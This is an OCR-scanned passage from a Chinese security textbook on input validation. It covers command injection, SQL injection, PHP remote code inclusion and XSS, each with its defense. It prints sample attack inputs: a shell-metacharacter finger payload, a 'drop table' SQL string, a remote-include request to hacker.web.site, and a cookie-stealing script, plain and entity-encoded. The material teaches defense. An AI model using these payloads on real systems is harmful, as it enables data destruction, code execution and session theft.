本 和 二 进 制 两 种 形式 。 当 处 理 二 进 制 数据 时 ， 程 序 假定 将 未 经 加 工 的 一 些 二 进 制 数据 解释 为 整 
数 、 浮 点 数 、 字 符 串 或 者 其 他 一 些 更 复杂 结构 的 数据 。 当 读 人 二 进 制 数据 时 ， 这 些 假设 的 解释 
必须 进行 验证 ， 如 何 进行 处 理 的 细节 很 大 程度 上 取决 于 信息 编码 的 特殊 解释 。 例 如 ， 在 以 太 网 
Wi, P EA TCP 段 中 网 络 协议 使 用 的 复杂 的 二 进 制 结构 ， 其 中 的 网 络 代 码 必须 细致 编写 和 验 
证 。 在 较 高 的 层 上 ,DNS、SNMP、NFS 和 其 他 的 协议 都 使 用 二 进 制 编码 ， 对 在 使 用 这 些 协 议 
的 各 方 之 间 发 出 的 请 求 和 响应 也 要 进行 二 进 制 编码 。 这 些 协议 经 常 使 用 一 些 抽象 语法 语言 来 说 
明 ， 因 而 任何 指定 的 值 都 必须 按照 这 个 规范 进行 验证 。 

2014 年 爆 出 的 心脏 出 血 (HeartBleed) OpenSSL 漏洞 (还 将 在 22.3 节 进 一 步 讨论 )， 就 是 没 
有 正确 检查 二 进 制 输入 值 的 有 效 性 的 一 个 例子 。 因 为 一 个 编程 错误 ， 这 个 错误 未 能 对 请 求 中 期 
望 返回 的 数据 量 和 实际 提供 的 数据 量 进行 检查 ， 使 得 攻击 者 有 了 访问 临近 的 内 存 地 址 的 机 会 ， 
其 中 可 能 存储 着 如 用 户 名 、 密 码 、 私 钥 和 其 他 一 些 敏 感 信息 。 这 些 漏洞 潜在 威胁 了 很 多 的 服务 
器 和 它们 的 用 户 。 这 就 是 缓冲 区 越界 读 取 的 一 个 例子 。 

一 般 而 言 ， 程 序 将 文本 数据 当 作 程 序 输 入 进行 处 理 。 依 据 某 些 字符 集 ， 未 经 加 工 的 二 进 
制 数据 被 解释 为 字符 。 通 常 假设 的 字符 集 是 ASCI 字符 集 ， 尽 管 常用 的 系统 ， 像 Windows 和 
MacOSX， 都 是 使 用 带 重 音字 符 的 不 同 的 扩展 字符 集 。 随 着 程序 的 使 用 越 来 越 国 际 化 ， 在 程序 
中 将 会 使 用 越 来 越 多 的 字符 集 。 程 序 员 必 须 仔 细 识 别 使 用 的 是 哪个 字符 集 ， 以 及 正在 读 人 的 是 
哪些 字符 。 

除了 识别 输入 是 什么 字符 之 外 ， 更 重要 的 是 确定 它们 的 含义 。 它 们 可 以 表示 一 个 整数 或 
者 一 个 浮 点 数 。 它 们 也 可 能 是 一 个 文件 名 、 一 个 URL 地 址 、 一 个 电子 邮件 地 址 或 者 一 些 形 式 
的 标识 符 。 在 使 用 这 些 输 入 之 前 ， 程 序 员 也 许 有 必要 确认 键 人 的 数据 是 否 真正 代表 了 期 望 的 数 
据 类 型 。 任何 失误 都 会 导致 程序 出 现 漏洞， 而 漏洞 又 给 了 攻击 者 可 乘 之 机 ， 从 而 造成 严重 的 
后 果 。 

为 了 说 明文 本 型 输入 数据 的 解释 问题 ， 我 们 首先 讨论 一 般 类 型 的 注入 攻击 ， 它 是 由 于 验证 
输入 的 解释 失败 而 造成 的 。 接 下 来 ， 我 们 回顾 一 些 使 用 各 种 字符 集 输 入 时 数据 的 验证 机 制 和 国 
际 化 输入 处 理 所 使 用 的 机 制 。 

注入 攻击 ”注入 攻击 〈injection attack) 这 个 术语 涉及 多 种 与 输入 数据 无 效 处 理 相关 的 程序 
缺陷 ， 特 别 是 当 程序 输入 数据 有 意 或 者 无 意 间 影响 到 程序 的 执行 流 的 时 候 ， 这 个 问题 就 发 生 
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了 。 有 很 多 种 机 制 能 够 引起 它 的 发 生 ， 最 常见 的 一 种 是 ， 当 输入 数据 作为 一 个 参数 传递 给 系统 
上 的 另 一 个 辅助 程序 的 时 候 ， 原 来 的 程序 会 接着 处 理 和 使 用 它 的 输出 。 当 使 用 像 Perl、PHP、 
Python sh 和 很 多 其 他 的 脚本 语言 进行 程序 开发 时 ， 上 述 情况 是 经 常 出 现 的 ， 这 些 语言 鼓励 对 
其 他 存在 的 程序 和 一 些 可 能 保存 编码 的 系统 工具 重复 使 用 。 过 去 这 些 语言 可 能 经 常 在 一 些 系 统 
上 开发 某 些 应 用 。 现 在 ， 在 Web CGI 脚本 中 经 常 使 用 它们 处 理 HTML 表单 提供 的 数据 。 

我 们 考虑 图 11-2a 中 显示 的 一 个 Perl CGI 脚本 。 一 个 指定 的 用 户 使 用 UNIX finger 命令 返 
回 一 些 基 本 的 细节 ， 这 个 脚本 放 在 Web 服务 器 一 个 适当 的 位 置 ， 调 用 这 个 脚本 能 够 响应 一 个 
简单 的 表单 ， 如 图 11-2b 所 示 。 通 过 在 服务 器 系统 上 运行 一 个 程序 ， 返 回程 序 的 输出 ， 如 果 有 
必要 在 一 个 HTML Web 页 里 对 输出 的 内 容重 新 进行 适当 的 格式 化 ， 这 个 脚本 就 能 从 服务 器 上 
取 回 想 要 得 到 的 信息 。 这 个 类 型 的 表单 和 相关 的 处 理 程序 都 很 常见 ， 经 常 作为 编写 和 使 用 CGI 
脚本 的 简单 例子 。 非 常 不 幸 的 是 ， 这 个 脚本 存在 一 个 致命 的 漏洞 ， 用 户 输入 的 值 作 为 一 个 参数 
直接 传递 给 finger 程序 。 如 果 提 供 的 是 一 个 合法 用 户 的 标识 符 ， 例 如 lpb， 接 下 来 将 会 输出 这 
个 用 户 的 信息 ， 如 图 11-2c 第 一 部 分 所 示 。 然 而 ， 如 果 攻 击 者 提供 一 个 值 ， 其 中 包括 shell 元 
字符 S (meta-character)， 例 如 ，xxx ; echo attack success; 1s -lfinger* ， 接 下 来 输出 的 信息 就 是 
图 11-2c 后 一 部 分 显示 的 内 容 。 利 用 Web 服务 器 的 特权 ， 攻 击 者 能 够 运行 系统 上 任何 一 个 程 
序 ， 在 这 个 例子 中 除了 提供 一 个 用 户 标 识 以 外 ， 另 外 的 两 条 命令 正好 显示 一 条 信息 并 且 列 出 
Web 目录 下 的 一 些 文件 。 但 是 任何 命令 都 可 以 被 使 用 。 

这 就 是 一 个 命令 注入 (command injection) 攻击 ， 因 为 使 用 的 输入 数据 可 以 建立 一 个 命令 ， 
随后 通过 拥有 Web 服务 器 特权 的 系统 执行 这 个 命令 。 这 说 明 问 题 的 产生 是 由 于 没有 对 输入 的 
数据 进行 充分 检查 。 而 脚本 设计 者 主要 关心 能 够 给 一 个 正在 存在 的 系统 工具 提供 Web 访问 。 
其 所 希望 提供 的 输入 是 一 些 用 户 名 或 者 登录 标识 ， 正 如 当 系 统 上 的 一 个 用 户 运行 fnger 程序 时 
那样 。 这 样 的 用 户 能 够 清楚 地 提供 一 些 数据 值 进行 命令 注入 攻击 ， 利 用 他 们 已 经 获得 的 特权 随 
意 运 行程 序 。 只 要 提供 了 Web 界面 ， 安 全 问题 就 可 能 会 出 现 ， 因 为 此 时 Web 服务 器 的 特权 程 
序 正在 运行 ， 但 却 使 用 了 一 个 未 知 的 外 部 用 户 提供 的 参数 。 

为 了 应 对 这 种 攻击 ， 程 序 员 需要 明确 识别 有 关 输 入 形式 的 任何 假设 ， 在 使 用 数据 之 前 验证 
这 些 数据 与 其 假设 是 否 一 致 。 验 证 的 时 候 通 常 将 输入 的 数据 与 描述 假设 形式 的 模式 进行 比较 ， 
一 旦 测试 失败 就 拒绝 该 输入 。 后 面 将 讨论 模式 匹配 。 在 图 11-2d 中 ， 对 存在 漏洞 的 fnger CGI 
脚本 进行 了 一 个 适当 的 扩展 。 它 增加 了 一 个 检验 确保 用 户 输入 的 内 容 只 包括 字母 和 数字 ， 如 
果 不 是 这 样 ， 脚 本 就 会 用 一 个 特殊 的 错误 信息 中 断 ， 这 个 错误 信息 将 会 指出 输入 数据 包含 非 
法 字符 S98。 我 们 注意 到 ， 在 这 个 例子 中 使 用 的 是 Perl， 实 际 上 使 用 任何 语言 编写 的 CGI 程序 
都 会 出 现 该 类 型 的 错误 。 所 有 语言 都 会 检查 输入 与 假设 形式 是 否 匹配 ， 但 是 解决 的 细节 是 不 
同 的 。 

另 一 种 广泛 使 用 的 注入 攻击 是 SQL ZA (SQL injection)。 在 这 种 攻击 中 ， 由 用 户 提供 的 
输入 数据 可 以 建立 一 个 SQL 请 求 ， 从 数据 库 取 回 一 些 信息 。 图 11-3a 是 从 一 个 CGI 脚本 里 摘 
录 的 PHP 代码， 我 们 把 一 个 名 字 当 作 输 入 提供 给 脚本 ， 这 个 名 字 从 一 个 如 图 11-2b 所 示 的 表 
单字 段 中 读 取 ， 使 用 这 个 值 建 立 一 个 请 求 ， 从 数据 库 中 取出 与 该 姓名 相关 的 记录 。 这 段 代码 的 
漏洞 与 前 面 的 命令 注入 例子 非常 类 似 ， 它 们 之 间 的 不 同 仅仅 在 于 SQL 注入 利用 SQL 元 字符 ， 


而 命令 注 人 利用 shell 元 字符 。 如 果 输 入 一 个 适当 的 姓名 ,例如 ，Bob， 接 下 来 代码 就 会 按照 设 


O shell 元 字符 用 于 分 离 或 组 合 多 个 命令 。 在 这 个 例子 中 ,“; ”分 隔 开 各 个 不 同 的 命令 ， 这 些 命令 可 以 按照 顺序 
运行 。 

© 并 不 建议 使 用 die 中 断 一 个 Perl CGI。 在 这 个 例子 中 ， 是 为 了 简短 才 使 用 的 。 然 而 ， 一 个 好 的 设计 脚本 应 该 
显示 一 个 关于 这 个 问题 的 更 多 有 益 的 错误 信息 ， 并 提示 用 户 返回 并 改正 输入 数据 。 
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想 的 目的 开始 运行 ， 返 回 与 Bob 相关 的 数据 库 记 录 。 然 而 ， 如 果 输 入 元 字符 “Bob'; drop table 
suppliers ”， 那 么 运行 结果 将 返回 特定 的 数据 库 记 录 ， 但 是 接着 将 删除 整个 表 ! 对 之 后 的 用 户 
来 讲 ， 这 是 一 个 相当 不 幸 的 结果 。 为 了 阻止 这 类 攻击 ， 所 有 输入 在 使 用 之 前 必须 进行 验证 ， 任 
何 元 字符 必须 清除 ， 消 除 它们 的 影响 ， 或 者 完全 拒绝 元 字符 输入 。 目 前 人 们 已 经 普遍 认识 到 
SQL 注入 攻击 的 危害 ， 在 CGI 脚本 中 使 用 的 很 多 程序 语言 都 包含 一 些 函 数 ， 它 们 能 够 对 包含 
在 一 个 SQL 请 求 中 的 任何 输入 进行 无 害处 理 ， 去 除 有 害 代 码 。 图 11-3b 中 显示 的 代码 说 明 使 
用 一 个 适当 的 PHP 函数 能 够 纠正 这 个 漏洞 。 为 了 使 SQL 语句 更 加 安全 ， 最 近 的 报告 推荐 使 用 
SQL 占 位 符 或 者 参数 来 安全 编写 SQL 语句 ， 而 非 直接 将 键 值 连接 起 来 。 结 合 存储 过 程 的 使 用 ， 
这 种 方法 可 以 使 代码 更 加 鲁 棒 和 安全 。 


#!/usr/bin/perl 
# finger.cgi - finger CGI script using Perl5 CGI module 


use CGI; 
use CGI::Carp qw(fatalsToBrowser) ; 
$q = new CGI; # create query object 


# display HTML header 
print $q->header, 
$q->start_html('Finger User'), 
$q->hl('Finger User') ; 
print "<pre>"; 


# get name of user and display their finger details 
$user = $q->param("user") ; 
print ~/usr/bin/finger -sh $user”; 


# display HTML footer 
print "</pre>"; 
print $q->end_html; 





a) 不 安全 的 Perl finger CGI 脚本 


<html><head><title>Finger User</title></head><body></html> 
<hl>Finger User</hl> 

<form method=post action="finger.cgi"> 

<b>Username to finger</b>: <input type=text name=user value=""> 
<p><input type=submit value="Finger User"> 
</form></body></html> 





b) finger 表 单 


Finger User 

Login Name TTY Idle Login Time Where 

lpb Lawrie Brown p0 Sat 15:24 ppp41.grapevine 
Finger User 

attack success 

-Ywxr-xr-x 1 lpb staff 537 Oct 21 16:19 finger.cgi 
-rw-r--r-- 1 lpb staff 251 Oct 21 16:14 finger.html 


c) 预期 的 、 受 到 破坏 的 finger CGI 的 响应 


# get name of user and display their finger details 
Suser = $q->param("user") ; 
die "The specified user contains illegal characters!" 





unless ($user =~ /*\w+$/); 
print ~/usr/bin/finger -sh $user”; 


d) Perl finger CGI 脚本 的 安全 扩展 
11-2 Web CGI 注入 攻击 
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$name = $ REQUEST['name'] ; 
$query = "SELECT * FROM suppliers WHERE name = '" 





$result = mysql_query ($query) ; 
a) 存在 漏洞 的 PHP 代 码 


Sname = $_REQUEST['name'] ; 
Squery = "SELECT * FROM suppliers AHERE name = '" 


mysql_real_escape_string($name) . 
$result = mysql_query ($query) ; 





b) 安全 的 PHP 代 码 
图 11-3 SQL 注入 的 例子 


第 三 种 广泛 使 用 的 攻击 是 代码 注入 ( code injection) 攻击 ， 在 这 种 攻击 中 ， 提 供 的 输入 包 
含 被 攻击 的 系统 能 够 运行 的 代码 。 在 第 10 章 中 ， 我 们 讨论 的 很 多 缓冲 区 溢出 的 例子 都 包含 代 
码 注入 。 在 那些 情形 下 ， 对 一 个 特殊 的 计算 机 系统 来 说 注入 的 代码 是 二 进 制 机 器 语言 。 然 而 ， 
将 脚本 语言 代码 注 人 能 够 远程 运行 的 脚本 中 也 是 值得 关注 的 问题 。 图 11-4a 中 列 出 一 个 有 漏洞 
的 PHP 日 志 脚 本 的 开始 几 行 ， 漏洞 的 产生 是 由 于 使 用 一 个 变量 构造 了 一 个 文件 名 ， 这 个 文件 
随后 将 被 包含 到 该 脚本 中 。 我 们 注意 到 ， 这 个 脚本 并 不 是 被 直接 调用 ， 相 反 ， 它 只 是 一 个 大 的 
多 文件 程序 的 一 部 分 。 主 脚本 设置 了 变量 $path 的 值 ， 该 变量 的 值 是 包括 这 个 程序 、 所 有 代码 
和 数据 文件 的 主要 路 径 。 在 程序 其 他 地 方 使 用 这 个 变量 意味 着 仅 需要 改变 几 行 来 定制 安装 这 个 
程序 。 令 人 遗憾 的 是 ， 攻 击 者 并 不 遵守 这 条 规则 。 因 为 一 个 脚本 没有 设计 成 被 直接 调用 并 不 说 
明 它 不 能 被 直接 调用 。 在 Web 服务 器 上 ， 为 了 阻止 直接 调用 ， 必 须 配 置 访问 保护 以 阻止 直接 
访问 。 和 否则 ， 如 果 对 这 个 脚本 的 直接 访问 与 PHP 的 其 他 两 行 语句 结合 ， 就 可 能 造成 严重 的 攻 
击 。 首 先 ，PHP 将 原来 在 HTTP 请 求 中 提供 的 任何 输入 变量 的 值 分 配给 同名 的 全 局 变量 ， 一 
毫 无 经 验 的 程序 员 可 以 很 容易 地 编写 这 种 表单 处 理 程 序 。 不 幸 的 是 ， 没 有 办 法 对 脚本 仅 限制 它 
期 望 的 字段 ， 因 而 一 个 用 户 能 够 为 任意 一 个 期 望 的 全 局 变量 随意 指定 一 些 值 ， 这 些 值 能 够 被 传 
递 给 脚本 。 在 这 个 例子 中 ， 变 量 $path 不 是 一 个 表单 字段 ，PHP 的 第 二 行 是 一 个 include 命令 ， 
它 不 仅 能 包含 本 地 文件 ， 而 且 如 果 提 供 了 一 个 URL， 那 么 可 以 包含 源 自 网 络 上 任何 地 方 的 源 
代码 。 综 上 所 述 ， 利 用 一 个 与 图 11-4b 相似 的 请 求 就 可 以 实现 代码 注入 攻击 。 这 就 导致 变量 
$path 包含 一 个 文件 的 URL， 这 个 文件 是 攻击 者 的 PHP 代码 。 同 时 变量 $path 也 能 定义 另 一 个 
变量 gcmd， 它 告诉 攻击 者 的 脚本 可 以 运行 什么 命令 。 在 这 个 例子 中 ， 附 加 的 命令 可 以 非常 简 
单 地 列 出 当前 路 径 下 的 所 有 文件 。 然 而 ， 这 个 命令 也 可 以 是 Web 服务 器 上 的 任何 命令 ， 只 要 
拥有 特权 就 能 运行 。 这 种 特殊 类 型 的 攻击 就 是 一 个 PHP 远程 代码 注入 (remote code injection). 
最 近 的 报告 指出 ， 许 多 的 PHP CGI 脚本 容易 受到 这 种 类 型 的 攻击 ， 攻 击 者 利用 它 频繁 进行 
攻击 。 


<?php 
include $path . 'functions.php'; 





include $path . 'data/prefs.php'; 


a) 存在 漏洞 的 PHP 代 码 


GET /calendar/embed/day.php?path=http://hacker.web.site/hack.txt?&cmd=1s 


b) HTTP 的 攻击 请 求 
图 11-4 PHP 代码 注入 的 例子 


有 一 些 防御 方法 可 以 有 效 阻止 这 种 类 型 的 攻击 。 最 明显 的 方法 是 ， 阻 止 将 表单 字段 的 值 
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分 配给 全 局 变量 。 原 本 这 些 值 存储 在 一 个 数组 中 ， 并 且 必 须 通过 名 字 取 出 ， 这 种 行为 在 图 11-3 
的 代码 中 已 经 说 明 。 对 所 有 新 版 本 的 PHP 来 说 这 是 默认 的 。 这 个 方法 的 不 足 之 处 在 于 ， 它 会 
中 断 使 用 以 前 版 本 编写 的 PHP 代码 ， 而 修改 这 些 代 码 需要 程序 员 付出 相当 多 的 努力 。 尽 管 如 
此 ， 这 仍然 是 一 个 首选 ， 除 非 程序 员 能 够 仔细 地 进行 控制 。 该 方法 不 仅 能 够 阻止 这 种 特殊 类 型 
的 攻击 ， 而 且 也 能 阻止 包含 全 局 变量 值 的 处 理 在 内 的 很 多 种 其 他 类 型 的 攻击 。 另 一 个 防御 方法 
是 ,在 include (和 require) 命令 中 仅 使 用 常量 值 。 它 能 确保 包含 的 代码 真正 源 于 指定 的 文件 。 
如 果 不 得 不 使 用 一 个 变量 ， 那 么 在 使 用 之 前 必须 立即 进行 仔细 的 验证 。 

还 有 一 些 其 他 的 注入 攻击 ， 包 括 mail 注 人 、 格 式 化 字符 串 〈format string) 注入 和 解释 器 
(interpreter) 注入 。 而 且 新 的 注 人 攻击 也 在 不 断 被 发 现 。 无 论 何 时 ， 只 要 一 个 程序 调用 一 些 服 
务 ， 而 这 些 服 务 来 自 于 另 一 个 程序 、 服 务 或 者 函数 ， 就 可 能 发 生 注 入 攻击 ; 给 一 个 程序 传递 来 
源 于 外 部 的 一 些 不 可 信 、 没 有 进行 充分 检查 和 验证 的 信息 时 ， 也 可 能 发 生 注 和 攻击 。 以 上 这 些 
内 容 都 强调 我 们 需要 识别 所 有 的 输入 源 ， 在 使 用 这 些 输入 之 前 验证 所 有 的 假设 情况 ， 以 及 理解 
那些 提供 给 调用 程序 、 服 务 和 函数 的 数据 值 的 含义 和 解释 。 

跨 站 点 脚本 攻击 “” 另 一 大 类 的 漏洞 涉及 这 样 的 情况 : 一 个 用 户 给 程序 提供 输入 ， 而 由 此 产 
生 的 结果 输出 给 另外 一 个 用 户 。 因 为 这 种 攻击 经 常 在 脚本 型 的 Web 应 用 中 看 到 ， 因 此 称 其 为 
跨 站 点 脚本 (cross-site scripting) (XSS ©) 攻击 。 这 个 漏洞 包含 在 用 户 浏览 器 里 显示 的 一 个 Web 
页 的 HTML 内 容 中 包含 的 脚本 代码 中 。 该 脚本 代码 可 能 是 Javascript, ActiveX, VBScript. 
Flash 或 者 用 户 浏览 器 支持 的 任意 客户 端 脚本 语言 。 为 了 支持 某 些 Web 应 用 ， 脚 本 代码 需要 访 
问 与 用 户 浏览 器 当前 显示 的 其 他 Web 页 相关 的 数据 ， 由 于 这 些 数据 明显 增加 了 安全 隐患 ， 浏 
览 器 加 强 了 安全 检查 ， 并 对 这 些 来 源 于 相同 站 点 的 对 页 面 的 数据 访问 进行 了 限制 。 我 们 假设 来 
源 于 一 个 网 站 的 所 有 内 容 都 是 被 同等 信任 的 ， 并 且 因此 允许 与 该 站 点 的 其 他 内 容 进 行 交互 。 

跨 站 点 脚本 攻击 利用 了 这 个 假设 ， 企 图 避 开 浏览 器 的 检查 获得 更 高 权限 ， 然 后 访问 属于 另 
一 个 站 点 的 敏感 数据 。 这 些 数 据 可 能 包括 页 面 内 容 、 会 话 cookie 和 各 种 其 他 对 象 。 攻 击 者 可 
以 使 用 各 种 机 制 将 恶意 的 脚本 内 容 注 和 人 通过 目标 站 点 返回 给 用 户 的 Web 页 中 。 这 种 攻击 最 常 
见 的 变 体 是 XSS 反射 (reflection)。 攻 击 者 在 提交 给 站 点 的 数据 中 包含 恶意 的 脚本 代码 ， 如 果 
这 个 内 容 未 经 充分 检查 就 显示 给 其 他 用 户 ， 而 这 些 用 户 假设 这 个 脚本 是 可 以 信任 的 ， 他 们 将 执 
行 这 个 脚本 ,访问 与 那个 站 点 相关 的 任何 数据 。 我 们 研究 了 很 多 Web 站 点 广泛 应 用 的 留言 板 
(guestbook program)、 维 基 (wiki) 和 博客 (blog)， 它 们 都 允许 用 户 在 站 点 上 和 留言， 其 他 用 户 随 
后 就 可 以 看 到 这 些 留言 。 除 非 对 这 些 留 言 的 内 容 进 行 检 查 ， 删 除 其 中 危险 的 代码 ， 否 则 Web 
站 点 就 有 可 能 受到 攻击 。 

考察 图 11-5a 中 所 示 的 例子 。 如 果 这 些 文 本 通过 留言 板 进行 存储 ， 那 么 当 我 们 浏览 一 些 文 
本 时 ， 就 会 执行 其 中 的 JavaScript 代码 。 这 个 代码 可 以 用 攻击 者 的 cookie 脚本 返回 的 信息 代替 
文档 的 内 容 ， 攻 击 者 的 cookie 脚本 是 由 与 这 个 文档 相 联系 的 cookie 提供 的 。 很 多 站 点 ， 在 使 
用 它们 的 功能 之 前 需要 用 户 注册 ， 例 如 使 用 留言 板 。 在 这 种 攻击 中 ， 一 个 用 户 的 cookie 被 提 
供给 攻击 者 ， 攻 击 者 在 这 个 站 点 上 就 使 用 cookie 去 冒充 这 个 用 户 。 这 个 例子 用 攻击 者 的 脚本 
返回 的 内 容 非常 明显 地 代 苦 了 页 面 内 容 。 通 过 使 用 更 复杂 的 JavaScript 代码 ， 攻 击 者 有 可 能 使 
脚本 的 执行 更 加 隐秘 。 

为 了 阻止 这 种 攻击 ， 任 何 用 户 提 供 的 输入 都 要 接受 检查 ， 任 何 危 险 代码 都 要 被 删除 
或 者 阻止 执行 。 这 个 例子 看 起 来 很 容易 检查 和 纠 错 ， 但 攻击 者 不 可 能 做 这 么 简单 的 事情 。 
在 图 11-5b 中 显示 了 相同 的 代码 ,但 是 这 次 所 有 与 脚本 代码 相关 的 字符 都 使 用 HTML 字符 


日 ”缩写 XSS 指 跨 站 点 脚本 ,缩写 CSS 指 级 联 式 表单 (cascading style sheet)， 要 注意 进行 区 分 。 
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实体 9 进行 编码 。 当 浏览 器 将 这 些 编码 解释 为 图 11-5a 显示 的 相同 代码 时 ， 在 检查 可 能 的 攻击 
代码 之 前 都 必须 先 将 这 样 的 实体 字符 转换 成 它们 表示 的 字符 。 下 一 节 ， 我 们 将 进一步 讨论 这 些 


387] 内 容 。 


Thanks for this information, its great! 


<script>document.location='http://hacker.web.site/cookie.cgi?'+ 
document .cookie</script> 





a) 明文 形式 的 XSS 实 例 


Thanks for this information, its great! 

&HEO ; &H115; &H99; &H114 ; &H1L05 ; &H112; &H116; &H62; 
&H#100; &#111; &#99; &#117; &H109; &H#101; &H110; &#116; 
&H#46 ; &#108; &H111; &#99; &HOT; &H116 ; &H105; &#111; 
&#110; &#61; &#39; &#104; &H116 ; &H116 ; &H112; &#58; 
&H47 ; &H#47;&H104; &H97; EH#99; &H107; &H101; &H#114; 
&H4O6 ; &#119; &#101; &H9B; &H46; &H115 ; &H105 ; &H116; 


&#101; &#47; &#99; &H111; &H#111; &#107; &#105; &#101; 
EH46 ; &HOD; &H103 ; &#105; &#63; &#39; &H43; &H100; 
&#111; &#99; &#117; &H#109; &H101; &H110; &H116 ; &H46; 
&#99; &HLI1; &H111; &#107; &H105; &#101; &H60; &H47; 
&#115;&#99;&#114; &#105; &H112; &H116 ; &HE2; 





b) 编码 后 的 XSS 实 例 
图 11-5 XSS 实例 


XSS 攻击 意味 着 正确 处 理 程序 输入 和 输出 的 失败 。 检 查 和 验证 的 失败 导致 程序 存储 的 数 
据 具 有 潜在 的 危险 。 然 而 ， 攻 击 者 的 目标 并 不 是 这 个 程序 ， 而 是 随后 访问 程序 的 用 户 ， 以 及 用 
户 访问 这 个 程序 所 使 用 的 程序 。 如 果 程序 中 所 有 可 能 不 安全 的 数据 输出 都 被 清除 ， 那 么 攻击 就 
不 会 发 生 。 在 11.5 节 我 们 将 讨论 对 输出 的 正确 处 理 。 

还 有 很 多 其 他 的 攻击 与 XSS 类 似 ， 包 括 跨 站 点 请 求 伪造 及 HTTP 响应 分 离 。 而 且 这 些 问 
题 也 多 是 随意 使 用 不 信任 的 、 未 检查 的 输入 引起 的 。 


11.2.3 ”验证 输入 语法 


假定 程序 员 不 能 控制 输入 数据 的 内 容 ， 那 么 在 使 用 这 些 数 据 之 前 就 有 必要 确保 这 些 数 据 与 
对 数据 的 假设 一 致 。 如 果 数 据 是 文本 类 型 的 ， 那么 假设 的 输入 内 容 可 以 是 仅 包含 可 打印 字符 的 
数据 ， 其 中 有 明显 的 HTML 标记 ， 它 们 可 以 是 一 个 人 的 名 字 、 一 个 用 户 的 id、 一 个 电子 邮件 
地 址 、 一 个 文件 名 或 一 个 URL。 这 些 数据 也 可 能 代表 一 个 整数 或 者 其 他 数值 。 一 个 程序 在 使 
用 这 些 输入 的 时 候 ， 需 要 确认 它 是 否 满足 这 些 假设 。 输 入 的 数据 一 定 要 与 输入 假设 进行 比较 ， 
仅 接 受 有 效 的 输入 ， 这 是 一 个 重要 的 原则 。 另 一 个 原则 是 将 输入 的 数据 和 已 知 的 危险 数据 进行 
比较 。 但 是 采用 这 种 方法 也 会 出 现 问题 ， 那 就 是 不 断 发 现 的 新 问题 和 新 方法 还 是 可 以 避 开 已 经 
存在 的 检查 的 。 通 过 试图 阻止 已 知 的 危险 输入 数据 ， 攻 击 者 采用 新 的 编码 依然 可 以 成 功 发 起 攻 
击 。 程 序 仅 接 受 已 知 的 安全 数据 ， 才 更 有 可 能 保持 安全 。 

这 类 比较 通常 采用 正则 表达 式 ( regular expression) 完成 。 程 序 员 可 以 明确 地 对 其 进行 编 
码 ， 也 可 以 将 它 包含 在 一 个 提供 的 输入 处 理 例 程 中 。 图 11-2d 和 图 11-3b 给 出 这 两 种 方法 的 例 
子 。 正 则 表达 式 是 由 一 系列 描述 允许 的 输入 变化 的 字符 构成 的 模式 。 在 正则 表达 式 中 的 一 些 字 
符 是 逐个 处 理 的 ， 与 它们 进行 比较 的 输入 数据 必须 包含 那些 字符 。 其 他 的 一 些 字符 有 特殊 的 含 
义 ， 可 以 是 各 种 字符 集 的 详细 说 明 、 字 符 的 分 类 以 及 重复 的 字符 。 正 则 表达 式 的 内 容 和 用 法 的 


O HTML 字符 实体 允许 字符 集中 的 任何 字符 使 用 编码 形式 。 例 如 ，&#60 代表 字符 “<”。 
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详细 信息 在 不 同 的 语言 中 是 不 同 的 ， 在 使 用 的 时 候 需 要 考虑 是 哪 种 语言 的 使 用 方法 。 

如 果 输 入 的 数据 比较 失败 ， 那 么 就 要 遭 到 拒绝 。 这 时 ， 一 个 适当 的 错误 信息 将 发 送 到 输入 
源 ， 人 允许 用 户 改正 或 者 重新 输入 。 程 序 也 可 以 改变 输入 数据 再 进行 确认 ， 经 常 是 避 开 元 字符 ， 
避免 任何 特殊 的 解释 ， 从 而 保证 输入 的 安全 。 

图 11-5 进一步 说 明了 输入 数据 多 重 编码 的 问题 。 发 生 这 个 问题 是 因为 数据 在 HTML 中 或 
者 在 一 些 其 他 结构 化 的 编码 中 允许 字符 的 多 重 表 示 。 一 些 字符 集 编码 包括 相同 字符 的 多 重 编 
码 ， 同 样 也 会 发 生 这 个 问题 。Unicode 和 UTF-8 编码 就 能 非常 明白 地 说 明 这 个 问题 。 传 统 方式 
上 ， 计 算 机 程序 员 假 设 使 用 一 个 常见 的 单一 字符 集 ， 在 很 多 情况 下 就 是 ASCII 字符 集 ， 这 个 
7 位 的 字符 集 包括 所 有 英文 大 小 写字 母 、 数 字 和 标点 符号 ， 还 包括 在 计算 机 和 数据 通信 应 用 中 
很 多 常见 的 控制 字符 。 然 而 ， 它 不 能 表示 许多 欧洲 语言 使 用 的 其 他 带 重音 的 字符 ， 也 不 能 表示 
像 汉 语 和 日 语 使 用 的 大 量 的 字符 。 而 支持 全 球 用 户 使 用 自己 的 语言 进行 交流 的 需求 正在 不 断 增 
长 。 目 前 广泛 使 用 的 Unicode 字符 集 支 持 这 种 需求 ， 它 原本 是 Java 语言 使 用 的 字符 集 ， 也 是 
操作 系统 如 Windows XP 和 其 后 的 版 本 原本 使 用 的 字符 集 。Unicode 字符 集 使 用 16 位 表示 每 一 
个 字符 ， 这 就 提供 了 足够 的 字符 表示 世界 上 大 多 数 的 语言 。 可 是 ,很 多 程序 、 数 据 库 、 其 他 计 
算 机 和 通信 应 用 采取 8 位 字符 表示 ， 与 ASCH 开始 的 128 个 值 一 致 。 为 了 调节 这 个 差异 ,一 
个 Unicode 字符 需要 使 用 UTF-8 编码 成 为 一 个 1 至 4 字 节 的 序列 ， 任 何 字 符 都 有 一 个 唯一 的 
编码 。 如 果 在 规范 中 我 们 忽略 那些 严格 的 限制 ， 则 常见 的 ASCII 字符 可 以 有 多 重 编码 。 例 如 ， 
一 个 斜 杠 字 符 “ /”， 在 一 个 UNIX 文件 名 里 用 于 分 隔 路 径 ， 在 ASCII 和 UTF-8 中 都 是 十 六 进 
制 值 “2F”。UTF-8 编码 允许 元 余 ， 承 认 更 长 的 编码 :“ C0 AF” 和 “ E0 80 AF”。 当 严格 使 用 
最 短 编码 时 ， 很 多 Unicode 解码 器 接受 任何 一 个 同等 有 效 的 序列 。 

下 面 我 们 讨论 验证 输入 的 时 候 使 用 多 重 编码 的 后 果 。 有 一 类 攻击 企图 给 脚本 提供 一 个 绝对 
路 径 下 的 文件 ， 实 际 上 需要 的 仅 是 一 个 简单 的 当前 路 径 下 的 文件 名 。 我 们 通常 检查 提供 的 文件 
名 不 以 “/” 开 始 ， 或 者 不 包含 任何 “../” 上 一 级 路 径 的 表示 形式 。 但 如 果 此 处 的 检查 仅仅 假 
设 “/” 的 正确 编码 且 只 考虑 长 度 最 短 的 UTF-8 格式 的 话 ， 那 么 攻击 者 使 用 一 种 较 长 的 编码 就 
